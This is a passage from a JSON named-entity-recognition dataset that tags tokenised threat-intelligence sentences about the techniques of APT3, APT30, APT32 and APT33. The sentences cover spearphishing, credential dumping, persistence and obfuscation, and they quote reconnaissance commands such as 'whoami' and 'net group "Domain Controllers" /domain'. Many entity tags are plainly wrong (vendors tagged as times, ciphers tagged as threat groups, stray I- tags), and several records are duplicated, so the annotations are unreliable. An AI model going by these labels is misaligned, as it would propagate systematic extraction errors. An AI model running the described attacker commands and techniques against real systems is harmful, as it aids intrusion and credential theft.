"O" ] }, { "tokens": [ "An", "APT3", "downloader", "uses", "the", "Windows", "command", "<code>\"cmd.exe\"", "/C", "whoami</code>", "to", "verify", "that", "it", "is", "running", "with", "the", "elevated", "privileges", "of", "“System.”" ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "APT3", "downloader", "uses", "the", "Windows", "command", "<code>\"cmd.exe\"", "/C", "whoami</code>.", "The", "group", "also", "uses", "a", "tool", "to", "execute", "commands", "on", "remote", "computers." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT3", "has", "a", "tool", "that", "creates", "a", "new", "service", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT30", "has", "relied", "on", "users", "to", "execute", "malicious", "file", "attachments", "delivered", "via", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT30", "has", "used", "spearphishing", "emails", "with", "malicious", "DOC", "attachments." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT32's", "backdoor", "has", "used", "LZMA", "compression", "and", "RC4", "encryption", "before", "exfiltration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "includes", "garbage", "code", "to", "mislead", "anti-malware", "software", "and", "researchers." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "cleared", "select", "event", "log", "entries." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "the", "`Invoke-Obfuscation`", "framework", "to", "obfuscate", "their", "PowerShell." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "APT32", "has", "used", "COM", "scriptlets", "to", "download", "Cobalt", "Strike", "beacons." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "APT32", "used", "Outlook", "Credential", "Dumper", "to", "harvest", "credentials", "stored", "in", "Windows", "registry." ], "ner_tags": [ "B-Idus", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "ran", "legitimately-signed", "executables", "from", "Symantec", "and", "McAfee", "which", "load", "a", "malicious", "DLL.", "The", "group", "also", "side-loads", "its", "backdoor", "by", "dropping", "a", "library", "and", "a", "legitimate,", "signed", "executable", "(AcroTranscoder)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Time", "O", "B-Time", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "set", "up", "and", "operated", "websites", "to", "gather", "information", "and", "deliver", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "B-Purp" ] }, { "tokens": [ "APT32", "has", "infected", "victims", "by", "tricking", "them", "into", "visiting", "compromised", "watering", "hole", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-Way", "O" ] }, { "tokens": [ "APT32", "has", "stood", "up", "websites", "containing", "numerous", "articles", "and", "content", "scraped", "from", "the", "Internet", "to", "make", "them", "appear", "legitimate,", "but", "some", "of", "these", "pages", "include", "malicious", "JavaScript", "to", "profile", "the", "potential", "victim", "or", "infect", "them", "via", "a", "fake", "software", "update." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "collected", "e-mail", "addresses", "for", "activists", "and", "bloggers", "in", "order", "to", "target", "them", "with", "spyware." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "B-Org", "O", "B-Org", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "performed", "code", "obfuscation,", "including", "encoding", "payloads", "using", "Base64", "and", "using", "a", "framework", "called", "\"Dont-Kill-My-Cat", "(DKMC).", "APT32", "also", "encrypts", "the", "library", "used", "for", "network", "exfiltration", "with", "AES-256", "in", "CBC", "mode", "in", "their", "macOS", "backdoor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Idus", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32's", "backdoor", "has", "exfiltrated", "data", "using", "the", "already", "opened", "channel", "with", "its", "C&C", "server." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32's", "backdoor", "can", "exfiltrate", "data", "by", "encoding", "it", "in", "the", "subdomain", "field", "of", "DNS", "packets." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "RTF", "document", "that", "includes", "an", "exploit", "to", "execute", "malicious", "code.", "(CVE-2017-11882)" ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "APT32", "has", "used", "CVE-2016-7255", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "APT32's", "macOS", "backdoor", "can", "receive", "a", "“delete”", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32's", "backdoor", "possesses", "the", "capability", "to", "list", "files", "and", "directories", "on", "a", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "B-HackOrg", "O", "O", "O" ] }, { "tokens": [ "APT32's", "backdoor", "has", "stored", "its", "configuration", "in", "a", "registry", "key." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "conducted", "targeted", "surveillance", "against", "activists", "and", "bloggers." ], "ner_tags": [ "B-Idus", "O", "O", "B-OffAct", "O", "O", "B-Org", "O", "B-Org" ] }, { "tokens": [ "APT32's", "macOS", "backdoor", "hides", "the", "clientID", "file", "via", "a", "chflags", "function." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT32", "has", "used", "the", "WindowStyle", "parameter", "to", "conceal", "PowerShell", "windows." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "added", "JavaScript", "to", "victim", "websites", "to", "download", "additional", "frameworks", "that", "profile", "and", "compromise", "website", "visitors." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "JavaScript", "for", "drive-by", "downloads", "and", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "abused", "the", "PasswordChangeNotify", "to", "monitor", "for", "and", "capture", "account", "password", "changes." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "used", "Mimikatz", "and", "customized", "versions", "of", "Windows", "Credential", "Dumper", "to", "harvest", "credentials." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "deployed", "tools", "after", "moving", "laterally", "using", "administrative", "accounts." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "APT32's", "macOS", "backdoor", "changes", "the", "permission", "of", "the", "file", "it", "wants", "to", "execute", "to", "755." ], "ner_tags": [ "B-Idus", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "enumerated", "administrative", "users", "using", "the", "commands", "<code>net", "localgroup", "administrators</code>." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "legitimate", "local", "admin", "account", "credentials." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "email", "for", "C2", "via", "an", "Office", "macro." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "attempted", "to", "lure", "users", "to", "execute", "a", "malicious", "dropper", "delivered", "via", "a", "spearphishing", "attachment." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT32", "has", "lured", "targets", "to", "download", "a", "Cobalt", "Strike", "beacon", "by", "including", "a", "malicious", "link", "within", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT32", "has", "used", "hidden", "or", "non-printing", "characters", "to", "help", "masquerade", "service", "names,", "such", "as", "appending", "a", "Unicode", "no-break", "space", "character", "to", "a", "legitimate", "service", "name.", "APT32", "has", "also", "impersonated", "the", "legitimate", "Flash", "installer", "file", "name", "\"install_flashplayer.exe\"." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Exp", "B-Way", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "APT32", "has", "disguised", "a", "Cobalt", "Strike", "beacon", "as", "a", "Flash", "Installer." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "I-Exp", "B-Exp" ] }, { "tokens": [ "APT32", "has", "renamed", "a", "NetCat", "binary", "to", "kb-10233.exe", "to", "masquerade", "as", "a", "Windows", "update.", "APT32", "has", "also", "renamed", "a", "Cobalt", "Strike", "beacon", "payload", "to", "install_flashplayers.exe." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "B-SamFile" ] }, { "tokens": [ "APT32's", "backdoor", "has", "modified", "the", "Windows", "Registry", "to", "store", "the", "backdoor's", "configuration." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "mshta.exe", "for", "code", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT32", "used", "NTFS", "alternate", "data", "streams", "to", "hide", "their", "payloads." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "performed", "network", "scanning", "on", "the", "network", "to", "search", "for", "open", "ports,", "services,", "OS", "finger-printing,", "and", "other", "vulnerabilities." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "used", "the", "<code>net", "view</code>", "command", "to", "show", "all", "shares", "available,", "including", "the", "administrative", "shares", "such", "as", "<code>C$</code>", "and", "<code>ADMIN$</code>." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "An", "APT32", "backdoor", "can", "use", "HTTP", "over", "a", "non-standard", "TCP", "port", "(e.g", "14146)", "which", "is", "specified", "in", "the", "backdoor", "configuration." ], "ner_tags": [ "O", "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "used", "GetPassword_x64", "to", "harvest", "credentials." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT32", "have", "replaced", "Microsoft", "Outlook's", "VbaProject.OTM", "file", "to", "install", "a", "backdoor", "macro", "for", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "pass", "the", "hash", "for", "lateral", "movement." ], "ner_tags": [ "B-Idus", "O", "O", "I-Way", "I-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "successfully", "gained", "remote", "access", "by", "using", "pass", "the", "ticket." ], "ner_tags": [ "B-Idus", "O", "O", "I-OffAct", "I-OffAct", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "APT32", "has", "used", "PowerShell-based", "tools,", "PowerShell", "one-liners,", "and", "shellcode", "loaders", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Tool", "B-Way", "B-Tool", "O", "B-Way", "B-Tool", "O", "O" ] }, { "tokens": [ "APT32", "malware", "has", "injected", "a", "Cobalt", "Strike", "beacon", "into", "Rundll32.exe." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "O", "O", "B-Way", "B-Tool", "B-Way", "O", "B-SamFile" ] }, { "tokens": [ "APT32", "has", "used", "PubPrn.vbs", "within", "execution", "scripts", "to", "execute", "malware,", "possibly", "bypassing", "defenses." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32's", "backdoor", "can", "query", "the", "Windows", "Registry", "to", "gather", "system", "information." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "established", "persistence", "using", "Registry", "Run", "keys,", "both", "to", "execute", "PowerShell", "and", "VBS", "scripts", "as", "well", "as", "to", "execute", "their", "backdoor", "directly." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "O", "O", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "created", "a", "Scheduled", "Task/Job", "that", "used", "regsvr32.exe", "to", "execute", "a", "COM", "scriptlet", "that", "dynamically", "downloaded", "a", "backdoor", "and", "injected", "it", "into", "memory.", "The", "group", "has", "also", "used", "regsvr32", "to", "run", "their", "backdoor." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "enumerated", "DC", "servers", "using", "the", "command", "<code>net", "group", "\"Domain", "Controllers\"", "/domain</code>.", "The", "group", "has", "also", "used", "the", "<code>ping</code>", "command." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "moved", "and", "renamed", "pubprn.vbs", "to", "a", ".txt", "file", "to", "avoid", "detection." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "B-SamFile", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O" ] }, { "tokens": [ "APT32", "malware", "has", "used", "rundll32.exe", "to", "execute", "an", "initial", "infection", "process." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "used", "Net", "to", "use", "Windows'", "hidden", "network", "shares", "to", "copy", "their", "tools", "to", "remote", "machines", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "scheduled", "tasks", "to", "persist", "on", "victim", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32's", "backdoor", "has", "used", "Windows", "services", "as", "a", "way", "to", "execute", "its", "malicious", "payload." ], "ner_tags": [ "B-Idus", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "set", "up", "Facebook", "pages", "in", "tandem", "with", "fake", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "I-Tool", "O" ] }, { "tokens": [ "APT32", "compromised", "McAfee", "ePO", "to", "move", "laterally", "by", "distributing", "malware", "as", "a", "software", "deployment", "task." ], "ner_tags": [ "B-Idus", "O", "B-Time", "B-SecTeam", "O", "O", "O", "O", "I-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "sent", "spearphishing", "emails", "with", "a", "malicious", "executable", "disguised", "as", "a", "document", "or", "spreadsheet." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "sent", "spearphishing", "emails", "containing", "malicious", "links." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Way", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "malicious", "links", "to", "direct", "users", "to", "web", "pages", "designed", "to", "harvest", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "O" ] }, { "tokens": [ "APT32", "has", "collected", "the", "OS", "version", "and", "computer", "name", "from", "victims.", "One", "of", "the", "group's", "backdoors", "can", "also", "query", "the", "Windows", "Registry", "to", "gather", "system", "information,", "and", "another", "macOS", "backdoor", "performs", "a", "fingerprint", "of", "the", "machine", "on", "its", "first", "connection", "to", "the", "C&C", "server.", "APT32", "executed", "shellcode", "to", "identify", "the", "name", "of", "the", "infected", "host." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "used", "the", "<code>ipconfig", "/all</code>", "command", "to", "gather", "the", "IP", "address", "from", "the", "system." ], "ner_tags": [ "B-Idus", "O", "O", "B-SamFile", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "APT32", "used", "the", "<code>netstat", "-anpo", "tcp</code>", "command", "to", "display", "TCP", "connections", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "collected", "the", "victim's", "username", "and", "executed", "the", "<code>whoami</code>", "command", "on", "the", "victim's", "machine.", "APT32", "executed", "shellcode", "to", "collect", "the", "username", "on", "the", "victim's", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "scheduled", "task", "raw", "XML", "with", "a", "backdated", "timestamp", "of", "June", "2,", "2016.", "The", "group", "has", "also", "set", "the", "creation", "time", "of", "the", "files", "dropped", "by", "the", "second", "stage", "of", "the", "exploit", "to", "match", "the", "creation", "time", "of", "kernel32.dll.", "Additionally,", "APT32", "has", "used", "a", "random", "value", "to", "modify", "the", "timestamp", "of", "the", "file", "storing", "the", "clientID." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Time", "O", "B-Time", "O", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "obtained", "and", "used", "tools", "such", "as", "Mimikatz", "and", "Cobalt", "Strike,", "and", "a", "variety", "of", "other", "open-source", "tools", "from", "GitHub." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "hosted", "malicious", "payloads", "in", "Dropbox,", "Amazon", "S3,", "and", "Google", "Drive", "for", "use", "during", "targeting." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "macros,", "COM", "scriptlets,", "and", "VBS", "scripts." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "B-Way", "B-Tool", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "APT32", "has", "used", "JavaScript", "that", "communicates", "over", "HTTP", "or", "HTTPS", "to", "attacker", "controlled", "domains", "to", "download", "additional", "frameworks.", "The", "group", "has", "also", "used", "downloaded", "encrypted", "payloads", "over", "HTTP." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Way" ] }, { "tokens": [ "APT32", "has", "used", "Dropbox,", "Amazon", "S3,", "and", "Google", "Drive", "to", "host", "malicious", "downloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "I-Tool", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "set", "up", "Dropbox,", "Amazon", "S3,", "and", "Google", "Drive", "to", "host", "malicious", "downloads." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "I-Tool", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "Web", "shells", "to", "maintain", "access", "to", "victim", "websites." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "APT32", "has", "used", "cmd.exe", "for", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "APT32", "used", "WMI", "to", "deploy", "their", "tools", "on", "remote", "machines", "and", "to", "gather", "information", "about", "the", "Outlook", "process." ], "ner_tags": [ "B-Idus", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Purp", "I-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "APT32", "modified", "Windows", "Services", "to", "ensure", "PowerShell", "scripts", "were", "loaded", "on", "the", "system.", "APT32", "also", "creates", "a", "Windows", "service", "to", "establish", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "used", "WinRAR", "to", "compress", "data", "prior", "to", "exfil." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "used", "a", "variety", "of", "publicly", "available", "tools", "like", "LaZagne", "to", "gather", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "APT33", "has", "used", "compromised", "Office", "365", "accounts", "in", "tandem", "with", "Ruler", "in", "an", "attempt", "to", "gain", "control", "of", "endpoints." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "APT33", "has", "used", "a", "variety", "of", "publicly", "available", "tools", "like", "LaZagne", "to", "gather", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "APT33", "has", "used", "a", "variety", "of", "publicly", "available", "tools", "like", "LaZagne", "to", "gather", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "APT33", "has", "used", "a", "variety", "of", "publicly", "available", "tools", "like", "LaZagne", "to", "gather", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "APT33", "has", "used", "base64", "to", "encode", "payloads." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "used", "FTP", "to", "exfiltrate", "files", "(separately", "from", "the", "C2", "channel)." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "attempted", "to", "exploit", "a", "known", "vulnerability", "in", "WinRAR", "(CVE-2018-20250),", "and", "attempted", "to", "gain", "remote", "code", "execution", "via", "a", "security", "bypass", "vulnerability", "(CVE-2017-11774)." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "APT33", "has", "used", "a", "publicly", "available", "exploit", "for", "CVE-2017-0213", "to", "escalate", "privileges", "on", "a", "local", "system." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Exp", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "used", "a", "variety", "of", "publicly", "available", "tools", "like", "Gpppassword", "to", "gather", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "APT33", "has", "downloaded", "additional", "files", "and", "programs", "from", "its", "C2", "server." ], "ner_tags": [ "B-Idus", "O", "O", "B-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "used", "a", "variety", "of", "publicly", "available", "tools", "like", "LaZagne", "to", "gather", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "O", "I-Purp", "O" ] }, { "tokens": [ "APT33", "has", "used", "a", "variety", "of", "publicly", "available", "tools", "like", "LaZagne,", "Mimikatz,", "and", "ProcDump", "to", "dump", "credentials." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "I-Tool", "I-Tool", "I-Tool", "O", "B-Way", "B-Way", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "used", "malicious", "e-mail", "attachments", "to", "lure", "victims", "into", "executing", "malware." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "lured", "users", "to", "click", "links", "to", "malicious", "HTML", "applications", "delivered", "via", "spearphishing", "emails." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "APT33", "has", "used", "SniffPass", "to", "collect", "credentials", "by", "sniffing", "network", "traffic." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "I-Way", "O" ] }, { "tokens": [ "APT33", "has", "used", "HTTP", "over", "TCP", "ports", "808", "and", "880", "for", "command", "and", "control." ], "ner_tags": [ "B-Idus", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "used", "password", "spraying", "to", "gain", "access", "to", "target", "systems." ], "ner_tags": [ "B-Idus", "O", "O", "I-Tool", "I-Tool", "O", "I-Purp", "I-Purp", "O", "O", "O" ] }, { "tokens": [ "APT33", "has", "utilized", "PowerShell", "to", "download", "files", "from", "the", "C2", "server", "and", "run", "various", 